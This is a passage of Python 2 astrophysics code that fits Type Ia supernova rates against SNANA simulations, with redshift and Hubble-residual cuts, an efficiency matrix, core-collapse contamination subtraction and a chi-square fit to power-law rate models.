self.realcat.Catalog[realCond]\n self.simcat.Catalog = self.simcat.Catalog[simCond]\n '''\n\n self.realcat.Catalog = self.realcat.Catalog[ np.abs( self.realcat.Catalog['MURES'] * 1.0 / self.realcat.Catalog['MUERR'] ) < MURESCuts]\n self.simcat.Catalog = self.simcat.Catalog[ np.abs( self.simcat.Catalog['MURES'] * 1.0 / self.simcat.Catalog['MUERR'] ) < MURESCuts]\n print \"PostMURESCut Shape\"\n print self.realcat.Catalog.shape\n print 'zCut Post MURESCut'\n print np.sum((self.realcat.Catalog[self.ztype].astype(float) > self.zminFit) & (self.realcat.Catalog[self.ztype].astype(float) < self.zmaxFit))\n\n print \"Post cut Catalog\"\n\n print self.realcat.Catalog.shape\n\n if noCCMC:\n self.simgencat.Catalog = self.simgencat.Catalog[self.simgencat.Catalog['GENTYPE'] == 1]\n self.simcat.Catalog = self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] == 1]\n\n \n \n def newData(self, realfilename, realName, simInd =100):\n self.realName = realName\n self.shiftFlagData = False\n try:\n self.realcat = simread.SNANA_Cat(realfilename, realName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95)\n except:\n self.realcat = simread.SNANA_Cat(realfilename, realName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95, skip_header = 6 )\n if self.cheatType:\n print \"WARNING, THE FITTER IS CHEATING AND ELIMINATED NON-IAs USING SIM INFO\"\n self.realcat.Catalog = self.realcat.Catalog[self.realcat.Catalog['SIM_TYPE_INDEX'].astype(int) == 1]\n if simInd < self.nprint:\n print 'N precuts'\n print self.realcat.Catalog['FITPROB'].shape\n print \"Pre cut Catalog\"\n print self.realcat.Catalog.shape\n\n for cut in cuts:\n self.realcat.Catalog = self.realcat.Catalog[(self.realcat.Catalog[cut[0]].astype(type(cut[1])) > cut[1]) & (self.realcat.Catalog[cut[0]].astype(type(cut[2])) < cut[2])]\n\n self.realcat.Catalog = self.realcat.Catalog[(self.realcat.Catalog[self.ztype].astype(float) > self.zminSamp) & (self.realcat.Catalog[self.ztype].astype(float) < self.zmaxSamp)]\n print \"Post cut Catalog\"\n print self.realcat.Catalog.shape \n \n\n self.postCutRealCat = np.copy(self.realcat.Catalog)\n print 'MURESCUT'\n print self.MURESCuts\n print self.realcat.Catalog.shape\n if not (self.MURESCuts is None):\n \n #MURES Cut format: (zmin, zmax, neg Cut, pos Cut)\n '''\n for mc in self.MURESCuts:\n \n realCond = (self.realcat.Catalog[self.ztype] < mc[0]) | (self.realcat.Catalog[self.ztype] > mc[1])| ((self.realcat.Catalog['MURES'] > mc[2])& (self.realcat.Catalog['MURES'] < mc[3]))\n\n self.realcat.Catalog = self.realcat.Catalog[realCond]\n '''\n self.realcat.Catalog = self.realcat.Catalog[np.abs(self.realcat.Catalog['MURES']*1.0/self.realcat.Catalog['MUERR']) < MURESCuts]\n print \"PostMURESCut Shape\"\n print self.realcat.Catalog.shape\n\n \n if simInd < self.nprint:\n print \"Minimum Fitprob\"\n print np.min(self.realcat.Catalog['FITPROB'])\n print 'N postcuts'\n print self.realcat.Catalog['FITPROB'].shape\n\n def zSystematic(self, binList = None, nbins = None):\n assert(0)\n if nbins is None:\n try: \n self.nbins = len(binList) - 1\n self.binList = binList\n except:\n self.nbins = binList.shape[0] - 1\n self.binList = binList\n else:\n binList = np.linspace(self.zmin, self.zmax, nbins+1)\n self.nbins = nbins\n self.binList = binList\n if self.shiftFlagData:\n print \"DONT DOUBLE SHIFT\"\n return 0\n if not self.shiftFlagSim:\n \n oldsimz = self.simcat.Catalog['zPHOT']\n oldsimtruez = self.simcat.Catalog['SIM_ZCMB']\n stat, bins, binnum = stats.binned_statistic(oldsimz, oldsimz - oldsimtruez, bins = self.binList, statistic = 'mean')\n self.zBiasShifts = stat\n newsimz = oldsimz - stat[binnum]\n assert(np.sum(np.abs(newsimz - oldsimz)) > 0)\n assert((oldzshape - np.arange(0, oldz.shape[0]).shape[0])< 1)\n self.shiftFlagSim = True\n oldz = self.realcat.Catalog['zPHOT']\n _,_, binnum = stats.binned_statistic(oldz, oldz , bins = self.binList, statistic = 'mean')\n newz = oldz - self.zBiasShifts[binnum]\n oldzshape = oldz.shape[0]\n self.realcat.Catalog['zPHOT'].put(np.arange(0, oldz.shape[0]), newz)\n assert(np.sum(np.abs(newz - oldz)) > 0)\n assert((oldzshape - np.arange(0, oldz.shape[0]).shape[0])< 1)\n self.simFlagData = True\n \n def effCalc(self, fracContamCut = 0.0, nbinsSamp = None, nbinsFit = None, binListSamp = None, binListFit = None, simInd =100):\n #### Do we want SNIas or all SN for efficiency?\n import matplotlib as mpl\n if nbinsSamp is None:\n try: \n self.nbinsSamp = len(binListSamp) - 1\n self.binListSamp = binListSamp\n except:\n self.nbinsSamp = binListSamp.shape[0] - 1\n self.binListSamp = binListSamp\n else:\n binListSamp = np.linspace(self.zminSamp, self.zmaxSamp, nbinsSamp+1)\n self.nbinsSamp = nbinsSamp\n self.binListSamp = binListSamp\n\n if nbinsFit is None:\n try: \n self.nbinsFit = len(binListFit) - 1\n self.binListFit = binListFit\n except:\n self.nbinsFit = binListFit.shape[0] - 1\n self.binListFit = binListFit\n else:\n binListFit = np.linspace(self.zminFit, self.zmaxFit, nbinsFit+1)\n self.nbinsFit = nbinsFit\n self.binListFit = binListFit\n\n \n self.typeString = ''\n\n #if self.cheatZ:\n # self.ztype = 'SIM_ZCMB'\n #else:\n # self.ztype = 'zPHOT'\n\n '''\n if (fracContamCut > 0.000000001) & (fracContamCut < 1.0):\n print \" Cutting based on Frac Contam\"\n histTot, binsX, binsY = np.histogram2d(self.simcat.Catalog[ztype], self.simcat.Catalog['MURES'], bins = nbins)\n \n histCC, binsX, binsY = np.histogram2d(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) != 1][ztype], self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) != 1]['MURES'], bins = (binsX, binsY))\n\n fracContam = histCC.astype(np.float)/histTot.astype(np.float)\n\n for fcRow, i in zip(fracContam, xrange(binsX.shape[0])):\n for fc, j in zip(fcRow, xrange(binsY.shape[0])):\n if fc < fracContamCut:\n continue\n else:\n simInBin = (self.simcat.Catalog[ztype] > binsX[i]) & (self.simcat.Catalog[ztype] < binsX[i+1]) & (self.simcat.Catalog['MURES'] > binsY[j]) & (self.simcat.Catalog['MURES'] < binsY[j+1])\n realInBin = (self.realcat.Catalog[ztype] > binsX[i]) & (self.realcat.Catalog[ztype] < binsX[i+1]) & (self.realcat.Catalog['MURES'] > binsY[j]) & (self.realcat.Catalog['MURES'] < binsY[j+1])\n self.simcat.Catalog = self.simcat.Catalog[np.invert(simInBin)]\n self.realcat.Catalog = self.realcat.Catalog[np.invert(realInBin)]\n \n '''\n zPHOTs = self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) == 1][self.ztype].astype(float)\n\n zTRUEs = self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) == 1]['SIM_ZCMB'].astype(float)\n\n self.typeString = self.typeString + 'A1'\n \n \n print \"Type Location A\"\n print \"Choice A1\"\n print zPHOTs.shape\n print zTRUEs.shape\n print binList\n \n counts, zPhotEdges, zTrueEdges, binnumber = scipy.stats.binned_statistic_2d(zPHOTs, zTRUEs, zTRUEs, statistic = 'count', bins = (self.binListFit, self.binListSamp))\n assert(zPhotEdges.shape[0] == (self.nbinsFit + 1))\n print \"Type Location B\"\n print \"Choice B1\"\n \n self.typeString = self.typeString + 'B1'\n zGenHist, zGenBins = np.histogram(self.simgencat.Catalog[self.simgencat.Catalog['GENTYPE'].astype(int) == 1]['GENZ'].astype(float), bins = self.binListSamp)\n\n #zSim1Hist, zSim1Bins = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) ==1]['SIM_ZCMB'].astype(float), bins = self.binListSamp)\n \n \n \n print \"counts of zTrue in each zPhot vs zTrue bin\"\n print counts.astype(int)\n print \"zGen Bins\"\n print zGenBins\n print 'zGen Histogram'\n print zGenHist\n print \"sum zGen events\"\n print np.sum(zGenHist)\n print \"sum zPhot events\"\n print np.sum(counts)\n #print \"DEBUG HERE\"\n #assert(0)\n self.effmat = np.zeros((self.nbinsFit, self.nbinsSamp))\n xMax = zPhotEdges.shape[0] - 2\n yMax = zTrueEdges.shape[0] - 2\n print zGenHist\n print counts.astype(int)\n '''\n for zPhotLedge, zPhotRedge, row, i in zip(zPhotEdges[:-1], zPhotEdges[1:], counts, xrange(xMax + 1)):\n zPhotCenter = (zPhotLedge + zPhotRedge)/2.0\n for zTrueLedge, zTrueRedge, count, j in zip(zTrueEdges[:-1], zTrueEdges[1:], row, xrange(yMax + 1)):\n zTrueCenter = (zTrueLedge + zTrueRedge)/2.0\n inCell = (zPHOTs > zPhotLedge) & (zPHOTs < zPhotRedge) & (zTRUEs > zTrueLedge)& (zTRUEs < zTrueRedge)\n zPhotCell = zPHOTs[inCell];zTrueCell = zTRUEs[inCell]\n self.effmat[i][j] = count # np.sum(inCell)\n #print \"inCell\"\n #print np.sum(inCell)\n #print \"count\"\n #print count\n #try:\n # assert(np.abs(np.sum(inCell) - count) < 2)\n #except:\n # print \"CHECK ABOVE\"\n \n for row, i in zip(self.effmat, xrange(self.effmat.shape[0])):\n for j in xrange(row.shape[0]):\n self.effmat[i][j] /= zGenHist[j]\n '''\n self.effmat = counts/zGenHist\n\n #if simInd < self.nprint:\n print 'effmat'\n print self.effmat\n\n\n\n\n extent = [zPhotEdges[0], zPhotEdges[-1], zTrueEdges[0], zTrueEdges[-1]]\n if (simInd == 0) or (not ('sim' in self.realName.lower())):\n plt.figure()\n plt.imshow(np.flipud(counts.T), extent = extent, cmap = 'Blues')\n plt.colorbar()\n plt.savefig(self.realName + 'redshiftDistro.png')\n plt.clf()\n plt.close()\n plt.figure()\n plt.imshow(np.flipud(self.effmat.T), extent = extent, cmap = 'Blues', norm=mpl.colors.LogNorm())\n plt.colorbar()\n plt.savefig(self.realName + 'efficiencyMatrixLog.png')\n plt.clf()\n plt.close()\n plt.figure()\n plt.imshow(np.flipud(self.effmat.T), extent = extent, cmap = 'Blues')\n plt.colorbar()\n plt.savefig(self.realName + 'efficiencyMatrix.png')\n plt.clf()\n plt.close()\n \n def fit_rate(self, fixK = False, fixBeta = False, simInd =100, trueBeta = 0, CCScale = 1.0, CCScaleErr = None, TrueCCScale = 1.0, BetaInit = 0.0, kInit = 1.0, BetaErr = 1, kErr = 1, f_Js = None, CCZbins = None, scaleZBins = None, Blind = False):\n #import iminuit as iM\n #from iminuit import Minuit as M\n #import numpy as np\n #import matplotlib as mpl\n #import matplotlib.pyplot as plt\n #if self.cheatZ:\n # self.ztype = 'SIM_ZCMB'\n #else:\n # self.ztype = 'zPHOT'\n plt.switch_backend('Agg')\n\n if simInd < self.nprint:\n print \"Type Location C\"\n print \"Choice C1\"\n\n if len(self.typeString) <= 4:\n self.typeString = self.typeString + 'C1'\n\n\n nSim, simBins = np.histogram(self.simgencat.Catalog[self.simgencat.Catalog['GENTYPE'].astype(int) == 1]['GENZ'].astype(float), bins=self.binListSamp)\n if simInd < self.nprint:\n print \"nSim1\"\n print nSim\n print self.simgencat.Catalog.shape\n \n print \"FIGURE OUT WHY YOU MADE THIS ASSERT STATEMENT LATER\"\n #assert(0)\n nSim2, simBins2 = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) ==1][self.ztype].astype(float), bins=self.binListFit)\n \n \n \n nSim3, simBins3 = np.histogram(self.simcat.Catalog[self.ztype].astype(float), bins=self.binListFit)\n \n\n NCC , _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] != 1][self.ztype].astype(float), bins=self.binListFit)\n if self.fixCCScale:\n print \"Fix CC Scale at 1\"\n else:\n if simInd < self.nprint:\n print \"nSim2\"\n print nSim2\n print \"nSim3\"\n print nSim3\n print \"nCC\"\n print NCC\n OrigNCC = np.copy(NCC)\n if self.cheatCCSub:\n if self.cheatCCScale:\n print \"WARNING: Only cheating on CC Subtraction not scale\"\n print \"Setting NCC to infinity to make sure that cheating correctly\"\n print \"Diagnostics after this point may be nonsense\"\n print self.cheatCCSub\n print \"NCC BeforeFck\"\n print NCC\n NCC = NCC*1E100\n print \"NCC AfterFck\"\n print NCC \n elif self.cheatCCScale:\n print \"NCC Before1\"\n print NCC\n print TrueCCScale\n NCC = applyCCScale(NCC, TrueCCScale, CCScaleErr, zbins = CCZbins, datazbins = self.binListFit)\n print \"NCC After1\"\n print NCC\n else: \n print \"NCC Before2\"\n print NCC\n print CCScale\n NCC = applyCCScale(NCC, CCScale, CCScaleErr, zbins = CCZbins, datazbins = self.binListFit)\n print \"NCC After2\"\n print NCC\n #assert(0)\n\n \n NIa , _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] == 1][self.ztype].astype(float), bins=self.binListFit)\n '''\n DebugNIaPhot, _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] == 1]['zPHOT'].astype(float), bins=self.binListFit)\n DebugNCCPhot, _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] != 1]['zPHOT'].astype(float), bins=self.binListFit)\n DebugNCCPhot = applyCCScale(DebugNCCPhot, CCScale, CCScaleErr, zbins = scaleZBins, datazbins = self.binListFit)\n DebugNIaTrue, _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] == 1]['SIM_ZCMB'].astype(float), bins=self.binListSamp)\n DebugNCCTrue, _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] != 1]['SIM_ZCMB'].astype(float), bins=self.binListSamp)\n DebugNCCTrue = applyCCScale(DebugNCCTrue, CCScale, CCScaleErr, zbins = scaleZBins, datazbins = self.binListSamp)\n\n uselessCtr = 0\n for niap, nccp, niat, ncct, zp, zt in zip(DebugNIaPhot, DebugNCCPhot, DebugNIaTrue, DebugNCCTrue,(self.binListFit[1:] + self.binListFit[:-1])/2.0, (self.binListSamp[1:] + self.binListSamp[:-1])/2.0 ):\n uselessCtr +=1\n self.globalZTrueBinStorage.append(zt)\n self.globalZPhotBinStorage.append(zp)\n self.globalNDataIaPhotBinStorage.append(niap)\n self.globalNDataCCPhotBinStorage.append(nccp)\n self.globalNDataIaTrueBinStorage.append(niat)\n self.globalNDataCCTrueBinStorage.append(ncct)\n print \"UselessCtr\"\n print uselessCtr\n \n '''\n\n try:\n TrueNCC, _ = np.histogram(self.realcat.Catalog[self.realcat.Catalog['SIM_TYPE_INDEX'] !=1][self.ztype].astype(float), bins=self.binListFit)\n if simInd < self.nprint:\n\n print \"True NCC Data\"\n print TrueNCC\n except:\n print \"Using real data\"\n\n TrueNCC = 0.0\n\n nData, dataBins = np.histogram(self.realcat.Catalog[self.ztype].astype(float), bins=self.binListFit)\n print \"nData\"\n print nData\n if not(self.cheatCCSub):\n FracBad = NCC*1.0/(1.0*(NCC+NIa))\n nCCData = nData*FracBad\n else: \n nCCData = TrueNCC*1.0\n FracBad = TrueNCC*1.0/nData\n if simInd < self.nprint:\n print \"PreScale NCC/nSim\"\n print OrigNCC*1.0/(OrigNCC+NIa)\n \n print \"PreScale Pred NCC Data\"\n print OrigNCC*1.0/(OrigNCC+NIa)*nData\n\n print \"PreScale Pred NCC Data if 2NCC\"\n print OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData\n\n print \"TrueNCC\"\n print TrueNCC\n if type(TrueNCC) != int:\n if simInd < self.nprint:\n print \"PreScale PredNCCData - TrueNCCData\"\n print OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData - TrueNCC\n\n print \"PreScale PredNCCData - TrueNCCData/ PredNCCData\"\n print (OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData - TrueNCC)/(OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData)\n else:\n print \"Using real data\"\n \n print \"Mean of PreScale PredNCCData - TrueNCCData/ PredNCCData\"\n print np.nanmean((OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData - TrueNCC)/(OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData))\n\n print \"PostScale NCC/nData\"\n print NCC*1.0/(NCC+NIa)\n\n if simInd < self.nprint:\n print \"Fraction of CCs in each bin\"\n print FracBad\n\n print 'NCC'\n print NCC\n\n print 'nSim2'\n print nSim2\n print \"nData, dataBins, realcat shape pre contam correction\"\n print nData\n print dataBins\n print np.sum(self.realcat.Catalog[self.ztype].astype(float) > self.zmaxFit)\n print np.sum(self.realcat.Catalog[self.ztype].astype(float) < self.zminFit)\n print self.realcat.Catalog[self.ztype].shape\n \n print \"Ratio nData/nSim\"\n print 1.0*nData/(1.0*nSim3)\n \n\n print \"Ratio nSim2/nData\"\n print 1.0*nSim3/(1.0*nData)\n\n print \"FracBad\"\n print FracBad\n print 'NCCData'\n print nCCData\n\n if simInd < self.nprint:\n\n print \"overall Contam\"\n print np.sum(NCC)*1.0/(np.sum(nSim3)*1.0)\n \n def chi2func(nData, nSim, effmat, fnorm, zCentersSamp, zCentersFit, k = 1.0, Beta = 0.0, zBreak = 1.0, dump = False, complexdump = False, modelError = False, nIA = None, nCC = None, Rate_Model = 'powerlaw', zbins = None, simInd = 100, BetaPrior = (-3, 3), KPrior = (0.0, 50.0), priorRate = None, priorZEff = None, ratePriorErrUp = None, ratePriorErrDown =None, ratePriorErrAll = None, TrueNCCData = None, f_1 = 1.0, f_2 = 1.0, f_3 = 1.0, f_4 = 1.0, f_5 = 1.0, f_6 = 1.0, f_7 = 1.0, f_8 = 1.0, f_9 = 1.0, f_10 = 1.0, f_11 = 1.0):\n if simInd < self.nprint:\n print \"PRIORS2\"\n print priorRate\n print priorZEff\n print ratePriorErrUp\n print ratePriorErrDown\n Chi2Temp = 0.0\n if Rate_Model == 'powerlaw':\n f_Js = k*(1+zCentersSamp)**Beta\n elif Rate_Model == 'discrete':\n f_Js = np.array([f_1, f_2, f_3, f_4, f_5, f_6, f_7, f_8, f_9, f_10, f_11])\n elif (Rate_Model == 'brokenpowerlaw') | (Rate_Model == 'brokenpowerlawVar'):\n f_Js = []\n #zCenters = (zbins[1:]+zbins[:-1])/2.0\n temp = None\n for zC in zCentersSamp:\n if zC < zBreak:\n f_Js.append(k*(1+zC)**Beta)\n elif not(temp is None):\n f_Js.append(temp)\n else:\n temp = f_Js[-1]\n f_Js.append(temp)\n f_Js = np.array(f_Js)\n else: \n assert(0)\n if simInd < self.nprint:\n if Rate_Model == 'discrete':\n print \"f_Js init\"\n print f_Js\n else:\n print \"Beta init\"\n print Beta\n print \"k init\"\n print k\n #chi2Mat = np.zeros((self.nbinsFit))\n #adjNMC = np.zeros((self.nbinsFit))\n if Rate_Model == 'discrete':\n kprior = 0\n betaprior = 0\n else:\n kprior = weakPrior(k, KPrior)\n betaprior = weakPrior(Beta, BetaPrior)\n\n if dump and (self.nprint > simInd):\n print \"kprior\"\n print kprior\n print \"betaprior\"\n print betaprior\n if (nIA is None) or (nCC is None):\n if dump:\n print \"No CC Cut\"\n fracCCData = np.zeros(nData.shape)\n elif self.cheatCCSub:\n fracCCData = TrueNCC*1.0/nData \n\n else:\n if Rate_Model == 'discrete':\n if dump and (self.nprint > simInd):\n print 'f_J adjusted CC Cut'\n print Rate_Model\n print nCC\n print nIA\n print np.array(f_Js)\n fracCCData = (nCC*1.0)/((1.0*nCC + nIA*np.array(f_Js)))\n print fracCCData\n else:\n if dump and (self.nprint > simInd):\n print \"Beta Adjusted CC Cut\"\n print Rate_Model\n #BetaRatio = k*(1+zCenters)**(Beta)#/(1+zCenters)**MCBeta\n BetaRatio = (1+zCentersFit)**(Beta)#/(1+zCenters)**MCBeta\n if dump and (self.nprint > simInd):\n print \"Beta Ratio\"\n print BetaRatio\n print \"BadFracCCData\"\n print (nCC*1.0)/((1.0*nCC + nIA*BetaRatio))\n print \"bad NCCData\"\n print (nCC*1.0)/((1.0*nCC + nIA*BetaRatio))*nData\n fracCCData = (nCC*1.0)/((1.0*nCC + nIA*BetaRatio))\n \n \n\n if dump and (self.nprint > simInd):\n print 'abc'\n print \"fracCCData2\"\n print fracCCData\n print \"unscaled fracCCData\"\n print (1.0*nCC)/(1.0*(nCC+nIA))\n if self.cheatCCSub:\n nCCData = TrueNCCData\n if dump and (self.nprint < simInd):\n\n print \"Cheating CC Sub\"\n assert(not(TrueNCCData is None))\n\n elif dump and (self.nprint > simInd):\n print 'def'\n print \"Normal CC Sub\"\n if not self.cheatCCSub:\n nCCData = nData*fracCCData\n if dump and (self.nprint > simInd):\n print \"nCCData2\"\n print nCCData\n if not(TrueNCCData is None):\n print \"TrueNCCData\"\n print TrueNCCData\n \n \n #print f_Js\n #Check if I am scaling errors down with increasing MC size. Make MC twice as large as \"Data\" to test.\n if dump: chi2Storage = []\n if dump: scaledNSimStor = []\n if dump: JSumTempNumStor = []\n if dump: JSumTempDenStor = []\n\n if dump:\n print \"actually used NCC\"\n #print nCC\n print nCCData\n if dump and (simInd < self.nprint):\n print \"effmat\"\n print effmat\n print \"nData\"\n print nData\n print \"nCCData\"\n print nCCData\n print \"nSim\"\n print nSim\n\n print nCCData\n for row, nDataI, nCCDataI, i, zc in zip(effmat, nData, nCCData, range(self.nbinsFit), zCentersFit):\n if dump and (self.nprint > simInd):\n print 'effmat row'\n print row\n print 'nDataI'\n print nDataI\n print 'nCCDataI'\n print nCCDataI\n scaledNSimTemp = 0.0\n \n JSumTempNum = 0.0\n JSumTempDen = 0.0\n if dump and (simInd < self.nprint):\n print \"nBinsSamp\"\n print self.nbinsSamp\n assert(row.shape[0] == self.nbinsSamp)\n assert(nSim.shape[0] == self.nbinsSamp)\n assert(len(f_Js) == self.nbinsSamp)\n for eff, nSimJ, f_J, j in zip(row, nSim, f_Js, range(self.nbinsSamp)):\n if dump and (self.nprint > simInd):\n print 'NGen J'\n print nSimJ\n print 'JSumTempNum contr'\n print nSimJ*f_J*eff*fnorm\n print 'JSumTempDen contr'\n print nSimJ*f_J*eff*fnorm*f_J*fnorm\n #if dump and (i != j) and self.cheatZ and (self.nprint < simInd):\n # if nSimJ*f_J*eff*fnorm > 0:\n # print \" This should be zero but isnt \"\n # print nSimJ*f_J*eff*fnorm\n # assert(0)\n JSumTempNum += nSimJ*f_J*eff*fnorm\n JSumTempDen += nSimJ*f_J*eff*fnorm*f_J*fnorm\n dataFunc = np.maximum(nDataI ,1)\n #CCFunc = np.ceil(np.maximum(nCCDataI, 1))\n CCFunc = np.maximum(nCCDataI, 1)\n c2t = (nDataI - nCCDataI - JSumTempNum)**2/( dataFunc + CCFunc + JSumTempDen) \n if dump:\n JSumTempNumStor.append(JSumTempNum)\n JSumTempDenStor.append(JSumTempDen)\n\n if dump and (self.nprint > simInd):\n print i\n print 'nDataI'\n print nDataI\n print 'fnCCDataI'\n print nCCDataI\n print 'fnorm'\n print fnorm\n print \"JSumTempNum tot\"\n print JSumTempNum\n print \"JSumTempDen tot\"\n print JSumTempDen\n print \"Chi2Bin\"\n print c2t\n \n if dump:\n chi2Storage.append(c2t)\n \n if c2t > 5:\n print 'INSANITY CHECK ABOVE'\n\n \n # Chi2Temp += ((nDataI - nCCDataI - JSumTempNum)**2/(JSumTempNum + JSumTempDen))#*fnorm**2\n if nDataI > 1E-11 or JSumTempDen > 1E-11:\n Chi2Temp += c2t\n if dump and (self.nprint > simInd):\n print \"JSumTempNum/Den\"\n print JSumTempNumStor\n print JSumTempDenStor\n\n if dump:\n if (self.nprint >simInd):\n print Chi2Temp\n print kprior\n print betaprior\n print chi2Storage\n\n \n print \"nData\"\n print nData\n print \"nCCData\"\n print nCCData\n if priorRate is None:\n\n return Chi2Temp+kprior+betaprior , chi2Storage \n else:\n print \"PRIORS3\"\n print priorRate\n print \"fit k\"\n print k\n print 'MCK'\n print self.MCK\n print \"fit beta\"\n print Beta\n print 'MCBeta'\n print self.MCBeta\n print ratePrior(k*self.MCK, Beta + self.MCBeta, priorRate, priorZEff, ratePriorErrUp, ratePriorErrDown, ratePriorErrAll)\n\n return Chi2Temp+kprior+betaprior + ratePrior(k*self.MCK, Beta+self.MCBeta, priorRate, priorZEff, ratePriorErrUp, ratePriorErrDown, ratePriorErrAll), chi2Storage \n else:\n if dump and (self.nprint > simInd):\n print 'C2T'\n print Chi2Temp\n print kprior\n print betaprior\n\n if priorRate is None:\n\n return Chi2Temp+kprior+betaprior \n else:\n print \"PRIORS3\"\n print priorRate\n print \"fit k\"\n print k\n print 'MCK'\n print self.MCK\n print \"fit beta\"\n print Beta\n print 'MCBeta'\n print self.MCBeta\n print ratePrior(k*self.MCK, Beta+self.MCBeta, priorRate, priorZEff, ratePriorErrUp, ratePriorErrDown, ratePriorErrAll)\n\n return Chi2Temp+kprior+betaprior + ratePrior(k*self.MCK, Beta+self.MCBeta, priorRate, priorZEff, ratePriorErrUp, ratePriorErrDown, ratePriorErrAll)\n \n zCentersSamp = (self.binListSamp[1:] + self.binListSamp[:-1])/2.0\n zCentersFit = (self.binListFit[1:] + self.binListFit[:-1])/2.0\n \n #Is this right? Everything else in the other side of the chi2 function should be Ia only\n if self.cheatCCSub:\n self.fracCCData = TrueNCC*1.0/nData\n else:\n self.fracCCData = (NCC*1.0)/(1.0*(NCC + NIa))\n if (self.nprint > simInd):\n print \"nSim\"\n print nSim\n print 'fracCCData'\n print self.fracCCData\n print \"nData\"\n print nData\n #fnorm = float(np.sum(nData*(1-self.fracCCData)))/float(np.sum(nSim))\n fnorm = 1.0/240.0\n #print \"PRIORS\"\n #print self.priorZEff\n #print self.priorRate\n #print self.ratePriorErrUp\n #print self.ratePriorErrDown\n if self.Rate_Model == 'powerlaw':\n lamChi2 = lambda k, Beta: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)\n lamChi2Dump = lambda k, Beta: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, dump = True, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)\n MinObj = M(lamChi2, k = kInit, error_k = kErr , Beta = BetaInit, error_Beta = BetaErr, limit_k = (0.0, None), limit_Beta = (-100, 100), fix_k = fixK, fix_Beta = fixBeta)\n c2i, _ = lamChi2Dump(1.0, 0.0)\n\n print \"Chi2 init = {0}\".format(round(c2i, 4))\n elif self.Rate_Model == 'brokenpowerlaw':\n lamChi2 = lambda k, Beta: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, 1.0, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, Rate_Model = 'brokenpowerlaw', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)\n lamChi2Dump = lambda k, Beta: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, 1.0, dump = True, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, Rate_Model = 'brokenpowerlaw', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)\n\n MinObj = M(lamChi2, k = kInit, error_k = kErr , Beta = BetaInit, error_Beta = BetaErr, limit_k = (0.0, None), limit_Beta = (-100, 100), fix_k = fixK, fix_Beta = fixBeta)\n c2i, _ = lamChi2Dump(1.0, 0.0)\n\n print \"Chi2 init = {0}\".format(round(c2i, 4))\n elif self.Rate_Model == 'brokenpowerlawVar':\n lamChi2 = lambda k, Beta, zBreak: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, zBreak, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, Rate_Model = 'brokenpowerlawVar', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)\n lamChi2Dump = lambda k, Beta, zBreak: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, zBreak, dump = True, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, Rate_Model = 'brokenpowerlawVar', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)\n\n MinObj = M(lamChi2, k = kInit, error_k = kErr , Beta = BetaInit, error_Beta = BetaErr, limit_k = (0.0, None), limit_Beta = (-100, 100), fix_k = fixK, fix_Beta = fixBeta, zBreak = 1.0, error_zBreak = 0.1, limit_zBreak = (self.zminFit, self.zmaxFit))\n c2i, _ = lamChi2Dump(1.0, 0.0)\n\n print \"Chi2 init = 